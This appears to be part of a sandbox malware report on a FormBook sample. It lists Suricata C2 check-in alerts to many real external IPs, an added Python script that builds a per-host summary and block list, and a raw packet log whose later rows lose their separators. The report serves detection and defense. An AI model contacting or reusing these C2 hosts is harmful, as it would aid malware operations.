OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-02T15:23:39.782792+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49751 | 202.92.5.23 | 80 | TCP
2024-12-02T15:23:56.759707+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49790 | 13.248.169.48 | 80 | TCP
2024-12-02T15:23:59.548725+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49797 | 13.248.169.48 | 80 | TCP
2024-12-02T15:24:02.373348+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49804 | 13.248.169.48 | 80 | TCP
2024-12-02T15:24:05.071840+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49809 | 13.248.169.48 | 80 | TCP
2024-12-02T15:24:11.910522+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49825 | 209.74.77.109 | 80 | TCP
2024-12-02T15:24:14.605227+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49832 | 209.74.77.109 | 80 | TCP
2024-12-02T15:24:17.349205+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49839 | 209.74.77.109 | 80 | TCP
2024-12-02T15:24:20.056219+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49846 | 209.74.77.109 | 80 | TCP
2024-12-02T15:24:27.581133+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49863 | 202.79.161.151 | 80 | TCP
2024-12-02T15:24:30.299853+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49869 | 202.79.161.151 | 80 | TCP
2024-12-02T15:24:33.049846+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49875 | 202.79.161.151 | 80 | TCP
2024-12-02T15:24:35.928548+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49883 | 202.79.161.151 | 80 | TCP
2024-12-02T15:24:42.989311+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49899 | 46.30.211.38 | 80 | TCP
2024-12-02T15:24:45.641832+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49905 | 46.30.211.38 | 80 | TCP
2024-12-02T15:24:48.362326+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49914 | 46.30.211.38 | 80 | TCP
2024-12-02T15:24:50.989606+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49920 | 46.30.211.38 | 80 | TCP
2024-12-02T15:24:58.149770+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49936 | 103.224.182.242 | 80 | TCP
2024-12-02T15:25:00.822710+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49942 | 103.224.182.242 | 80 | TCP
2024-12-02T15:25:03.552588+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49948 | 103.224.182.242 | 80 | TCP
2024-12-02T15:25:06.141856+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49955 | 103.224.182.242 | 80 | TCP
2024-12-02T15:25:14.002988+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49972 | 149.88.81.190 | 80 | TCP
2024-12-02T15:25:16.675008+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49981 | 149.88.81.190 | 80 | TCP
2024-12-02T15:25:19.331148+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49987 | 149.88.81.190 | 80 | TCP
2024-12-02T15:25:22.080569+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49992 | 149.88.81.190 | 80 | TCP
2024-12-02T15:25:29.612576+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50001 | 101.35.209.183 | 80 | TCP
2024-12-02T15:25:32.284329+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50002 | 101.35.209.183 | 80 | TCP
2024-12-02T15:25:34.956723+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50003 | 101.35.209.183 | 80 | TCP
2024-12-02T15:25:37.661755+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50004 | 101.35.209.183 | 80 | TCP
2024-12-02T15:25:44.862317+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50005 | 38.47.232.202 | 80 | TCP
2024-12-02T15:25:47.536739+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50006 | 38.47.232.202 | 80 | TCP
2024-12-02T15:25:50.206089+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50007 | 38.47.232.202 | 80 | TCP
2024-12-02T15:25:53.002213+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50008 | 38.47.232.202 | 80 | TCP
2024-12-02T15:26:00.206507+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50009 | 208.91.197.39 | 80 | TCP
2024-12-02T15:26:03.231207+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50010 | 208.91.197.39 | 80 | TCP
2024-12-02T15:26:05.592145+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50011 | 208.91.197.39 | 80 | TCP
2024-12-02T15:26:08.807723+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50012 | 208.91.197.39 | 80 | TCP
2024-12-02T15:26:16.533640+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50013 | 43.205.198.29 | 80 | TCP
2024-12-02T15:26:19.222695+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50014 | 43.205.198.29 | 80 | TCP
2024-12-02T15:26:21.883704+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50015 | 43.205.198.29 | 80 | TCP
2024-12-02T15:26:24.548736+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50016 | 43.205.198.29 | 80 | TCP
2024-12-02T15:26:31.596620+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50017 | 172.67.187.114 | 80 | TCP
2024-12-02T15:26:34.268653+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50018 | 172.67.187.114 | 80 | TCP
2024-12-02T15:26:36.940519+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50019 | 172.67.187.114 | 80 | TCP
2024-12-02T15:26:40.068178+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50020 | 172.67.187.114 | 80 | TCP
2024-12-02T15:26:47.190348+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50021 | 172.67.167.146 | 80 | TCP
2024-12-02T15:26:49.862196+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50022 | 172.67.167.146 | 80 | TCP
2024-12-02T15:26:52.524614+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50023 | 172.67.167.146 | 80 | TCP
2024-12-02T15:26:55.202013+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 50024 | 172.67.167.146 | 80 | TCP
2024-12-02T15:27:02.582526+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 50025 | 74.48.143.82 | 80 | TCP
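The alert table above shows the sample walking down a list of hosts: three POST check-ins (SID 2855464) followed by one GET (SID 2855465) against each address, then a move to the next one roughly every 15 seconds. FormBook's configuration is known to mix decoy domains with the live C2, so the host sequence and per-host counts are the useful signal here. The following Python is an added example, not part of the Joe Sandbox report and not Suricata tooling: it parses alert rows in the column order of the table above (pipe-separated, as rendered here), groups them by destination in first-contact order, counts GET and POST check-ins per host, measures the rotation interval between hosts, and emits an ip:port block list. The embedded rows are copied from the first three hosts in the table; the row layout, class and function names are this example's own assumptions.

```python
"""Summarise FormBook check-in alerts per destination host.

Added example (not part of the Joe Sandbox report): parses Suricata alert rows
in the column order of the table above and exposes the host-rotation pattern.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from datetime import datetime

# Rows copied from the alert table above (first three hosts only). The
# pipe-separated layout is an assumption of this example, not a Suricata format.
SAMPLE_ALERTS = """\
2024-12-02T15:23:39.782792+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49751 | 202.92.5.23 | 80 | TCP
2024-12-02T15:23:56.759707+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49790 | 13.248.169.48 | 80 | TCP
2024-12-02T15:23:59.548725+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49797 | 13.248.169.48 | 80 | TCP
2024-12-02T15:24:02.373348+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49804 | 13.248.169.48 | 80 | TCP
2024-12-02T15:24:05.071840+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49809 | 13.248.169.48 | 80 | TCP
2024-12-02T15:24:11.910522+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49825 | 209.74.77.109 | 80 | TCP
2024-12-02T15:24:14.605227+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49832 | 209.74.77.109 | 80 | TCP
2024-12-02T15:24:17.349205+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49839 | 209.74.77.109 | 80 | TCP
2024-12-02T15:24:20.056219+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49846 | 209.74.77.109 | 80 | TCP
"""

# The ET signature names the HTTP method in parentheses, e.g. "Checkin (POST) M3".
METHOD_RE = re.compile(r"\((GET|POST)\)")


@dataclass
class Alert:
    ts: datetime
    sid: int
    signature: str
    severity: int
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str

    @property
    def method(self) -> str:
        """HTTP method named in the signature, or '?' if it names none."""
        m = METHOD_RE.search(self.signature)
        return m.group(1) if m else "?"


def parse_alert(line: str) -> Alert:
    """Parse one pipe-separated row; reject rows with the wrong column count."""
    cols = [c.strip() for c in line.split("|")]
    if len(cols) != 9:
        raise ValueError(f"expected 9 columns, got {len(cols)}: {line!r}")
    ts, sid, sig, sev, sip, sport, dip, dport, proto = cols
    return Alert(
        ts=datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
        sid=int(sid), signature=sig, severity=int(sev),
        src_ip=sip, src_port=int(sport), dst_ip=dip, dst_port=int(dport),
        proto=proto,
    )


def parse_alerts(text: str) -> list[Alert]:
    return [parse_alert(ln) for ln in text.splitlines() if ln.strip()]


@dataclass
class HostStats:
    first: datetime
    last: datetime
    ports: set[int] = field(default_factory=set)
    counts: dict[str, int] = field(default_factory=lambda: {"GET": 0, "POST": 0})


def per_host(alerts: list[Alert]) -> dict[str, HostStats]:
    """Group alerts by destination IP; dict order is first-contact order."""
    hosts: dict[str, HostStats] = {}
    for a in alerts:
        h = hosts.setdefault(a.dst_ip, HostStats(first=a.ts, last=a.ts))
        h.last = max(h.last, a.ts)
        h.ports.add(a.dst_port)
        h.counts[a.method] = h.counts.get(a.method, 0) + 1
    return hosts


def rotation_intervals(hosts: dict[str, HostStats]) -> list[float]:
    """Seconds from first contact with one host to first contact with the next."""
    firsts = [h.first for h in hosts.values()]
    return [round((b - a).total_seconds(), 1) for a, b in zip(firsts, firsts[1:])]


def block_list(hosts: dict[str, HostStats]) -> list[str]:
    """ip:port pairs in the order the sample contacted them."""
    return [f"{ip}:{p}" for ip, h in hosts.items() for p in sorted(h.ports)]


if __name__ == "__main__":
    stats = per_host(parse_alerts(SAMPLE_ALERTS))
    for ip, h in stats.items():
        dwell = (h.last - h.first).total_seconds()
        print(f"{ip:<16} POST={h.counts['POST']} GET={h.counts['GET']} dwell={dwell:.1f}s")
    print("rotation intervals (s):", rotation_intervals(stats))
    print("block list:", block_list(stats))
```

Treat the resulting block list as a starting point rather than a finished control: several of the addresses in the table sit in shared hosting or CDN space (172.67.0.0/16, for instance, lies inside Cloudflare's 172.64.0.0/13), so blocking them outright will hit unrelated sites. The domains the sample resolved, recorded elsewhere in this report, are the better indicator; the per-host counts are mainly useful for spotting which host, if any, the sample stayed with instead of rotating past.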
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 2, 2024 15:23:37.995934963 CET | 49751 | 80 | 192.168.2.5 | 202.92.5.23
Dec 2, 2024 15:23:38.115922928 CET | 80 | 49751 | 202.92.5.23 | 192.168.2.5
Dec 2, 2024 15:23:38.116024971 CET | 49751 | 80 | 192.168.2.5 | 202.92.5.23
Dec 2, 2024 15:23:38.126090050 CET | 49751 | 80 | 192.168.2.5 | 202.92.5.23
Dec 2, 2024 15:23:38.246201992 CET | 80 | 49751 | 202.92.5.23 | 192.168.2.5
Dec 2, 2024 15:23:39.782633066 CET | 80 | 49751 | 202.92.5.23 | 192.168.2.5
Dec 2, 2024 15:23:39.782644987 CET | 80 | 49751 | 202.92.5.23 | 192.168.2.5
Dec 2, 2024 15:23:39.782680988 CET | 80 | 49751 | 202.92.5.23 | 192.168.2.5
Dec 2, 2024 15:23:39.782792091 CET | 49751 | 80 | 192.168.2.5 | 202.92.5.23
Dec 2, 2024 15:23:39.782838106 CET | 49751 | 80 | 192.168.2.5 | 202.92.5.23
Dec 2, 2024 15:23:39.786046982 CET | 49751 | 80 | 192.168.2.5 | 202.92.5.23
Dec 2, 2024 15:23:39.906059027 CET | 80 | 49751 | 202.92.5.23 | 192.168.2.5
Dec 2, 2024 15:23:55.492791891 CET | 49790 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:23:55.613189936 CET | 80 | 49790 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:23:55.613277912 CET | 49790 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:23:55.627921104 CET | 49790 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:23:55.747853994 CET | 80 | 49790 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:23:56.759618998 CET | 80 | 49790 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:23:56.759706974 CET | 49790 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:23:57.144043922 CET | 49790 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:23:57.264406919 CET | 80 | 49790 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:23:58.162892103 CET | 49797 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:23:58.351563931 CET | 80 | 49797 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:23:58.351648092 CET | 49797 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:23:58.367033005 CET | 49797 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:23:58.594126940 CET | 80 | 49797 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:23:59.545023918 CET | 80 | 49797 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:23:59.548724890 CET | 49797 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:23:59.878146887 CET | 49797 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:23:59.998826027 CET | 80 | 49797 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:24:00.908456087 CET | 49804 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:24:01.221112013 CET | 80 | 49804 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:24:01.221237898 CET | 49804 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:24:01.235642910 CET | 49804 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:24:01.356193066 CET | 80 | 49804 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:24:01.356226921 CET | 80 | 49804 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:24:02.373215914 CET | 80 | 49804 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:24:02.373347998 CET | 49804 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:24:02.737459898 CET | 49804 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:24:02.858380079 CET | 80 | 49804 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:24:03.842936039 CET | 49809 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:24:03.962980986 CET | 80 | 49809 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:24:03.963063002 CET | 49809 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:24:03.972923994 CET | 49809 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:24:04.092927933 CET | 80 | 49809 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:24:05.071458101 CET | 80 | 49809 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:24:05.071774006 CET | 80 | 49809 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:24:05.071840048 CET | 49809 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:24:05.074723005 CET | 49809 | 80 | 192.168.2.5 | 13.248.169.48
Dec 2, 2024 15:24:05.196667910 CET | 80 | 49809 | 13.248.169.48 | 192.168.2.5
Dec 2, 2024 15:24:10.519582987 CET | 49825 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:10.639457941 CET | 80 | 49825 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:10.639544010 CET | 49825 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:10.680368900 CET | 49825 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:10.800338984 CET | 80 | 49825 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:11.910187960 CET | 80 | 49825 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:11.910459995 CET | 80 | 49825 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:11.910521984 CET | 49825 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:12.190613985 CET | 49825 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:13.212898016 CET | 49832 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:13.332909107 CET | 80 | 49832 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:13.333024979 CET | 49832 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:13.418637037 CET | 49832 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:13.538788080 CET | 80 | 49832 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:14.605081081 CET | 80 | 49832 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:14.605153084 CET | 80 | 49832 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:14.605226994 CET | 49832 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:14.925013065 CET | 49832 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:15.944175959 CET | 49839 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:16.064193964 CET | 80 | 49839 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:16.064279079 CET | 49839 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:16.083868027 CET | 49839 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:16.203866959 CET | 80 | 49839 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:16.203948975 CET | 80 | 49839 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:17.348841906 CET | 80 | 49839 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:17.349107027 CET | 80 | 49839 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:17.349205017 CET | 49839 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:17.597001076 CET | 49839 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:18.616226912 CET | 49846 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:18.736205101 CET | 80 | 49846 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:18.736310959 CET | 49846 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:18.745285034 CET | 49846 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:18.865295887 CET | 80 | 49846 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:20.056024075 CET | 80 | 49846 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:20.056060076 CET | 80 | 49846 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:20.056219101 CET | 49846 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:20.059303045 CET | 49846 | 80 | 192.168.2.5 | 209.74.77.109
Dec 2, 2024 15:24:20.179681063 CET | 80 | 49846 | 209.74.77.109 | 192.168.2.5
Dec 2, 2024 15:24:26.032694101 CET | 49863 | 80 | 192.168.2.5 | 202.79.161.151
Dec 2, 2024 15:24:26.152792931 CET | 80 | 49863 | 202.79.161.151 | 192.168.2.5
Dec 2, 2024 15:24:26.152932882 CET | 49863 | 80 | 192.168.2.5 | 202.79.161.151
Dec 2, 2024 15:24:26.166685104 CET | 49863 | 80 | 192.168.2.5 | 202.79.161.151
Dec 2, 2024 15:24:26.286664963 CET | 80 | 49863 | 202.79.161.151 | 192.168.2.5
Dec 2, 2024 15:24:27.531204939 CET | 80 | 49863 | 202.79.161.151 | 192.168.2.5
Dec 2, 2024 15:24:27.581132889 CET | 49863 | 80 | 192.168.2.5 | 202.79.161.151
Dec 2, 2024 15:24:27.674957037 CET | 49863 | 80 | 192.168.2.5 | 202.79.161.151
Dec 2, 2024 15:24:27.736965895 CET | 80 | 49863 | 202.79.161.151 | 192.168.2.5
Dec 2, 2024 15:24:27.737031937 CET | 49863 | 80 | 192.168.2.5 | 202.79.161.151
Dec 2, 2024 15:24:28.709409952 CET | 49869 | 80 | 192.168.2.5 | 202.79.161.151
Dec 2, 2024 15:24:28.829411030 CET | 80 | 49869 | 202.79.161.151 | 192.168.2.5
Dec 2, 2024 15:24:28.829509974 CET | 49869 | 80 | 192.168.2.5 | 202.79.161.151
Dec 2, 2024 15:24:28.848989010 CET | 49869 | 80 | 192.168.2.5 | 202.79.161.151
Dec 2, 2024 15:24:28.968919992 CET | 80 | 49869 | 202.79.161.151 | 192.168.2.5
Dec 2, 2024 15:24:30.245717049 CET | 80 | 49869 | 202.79.161.151 | 192.168.2.5
Dec 2, 2024 15:24:30.299853086 CET | 49869 | 80 | 192.168.2.5 | 202.79.161.151
Dec 2, 2024 15:24:30.362483025 CET | 49869 | 80 | 192.168.2.5 | 202.79.161.151
Dec 2, 2024 15:24:30.457093954 CET | 80 | 49869 | 202.79.161.151 | 192.168.2.5
Dec 2, 2024 15:24:30.457187891 CET | 49869 | 80 | 192.168.2.5 | 202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:31.495521069 CET4987580192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:31.615529060 CET8049875202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:31.618583918 CET4987580192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:31.683051109 CET4987580192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:31.803031921 CET8049875202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:31.803066015 CET8049875202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:32.998274088 CET8049875202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:33.049845934 CET4987580192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:33.190577030 CET4987580192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:33.201117039 CET8049875202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:33.202544928 CET4987580192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:34.355878115 CET4988380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:34.476008892 CET8049883202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:34.476103067 CET4988380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:34.699871063 CET4988380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:34.820947886 CET8049883202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:35.873297930 CET8049883202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:35.928548098 CET4988380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:36.075382948 CET8049883202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:36.075552940 CET4988380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:36.076663017 CET4988380192.168.2.5202.79.161.151
                                                                                                                  Dec 2, 2024 15:24:36.196527004 CET8049883202.79.161.151192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:41.545818090 CET4989980192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:41.665972948 CET804989946.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:41.666600943 CET4989980192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:41.681350946 CET4989980192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:41.801244974 CET804989946.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:42.989131927 CET804989946.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:42.989264011 CET804989946.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:42.989310980 CET4989980192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:43.190720081 CET4989980192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:44.212541103 CET4990580192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:44.332618952 CET804990546.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:44.332699060 CET4990580192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:44.352227926 CET4990580192.168.2.546.30.211.38
                                                                                                                  Dec 2, 2024 15:24:44.472161055 CET804990546.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:45.641560078 CET804990546.30.211.38192.168.2.5
                                                                                                                  Dec 2, 2024 15:24:45.641690016 CET804990546.30.211.38192.168.2.5
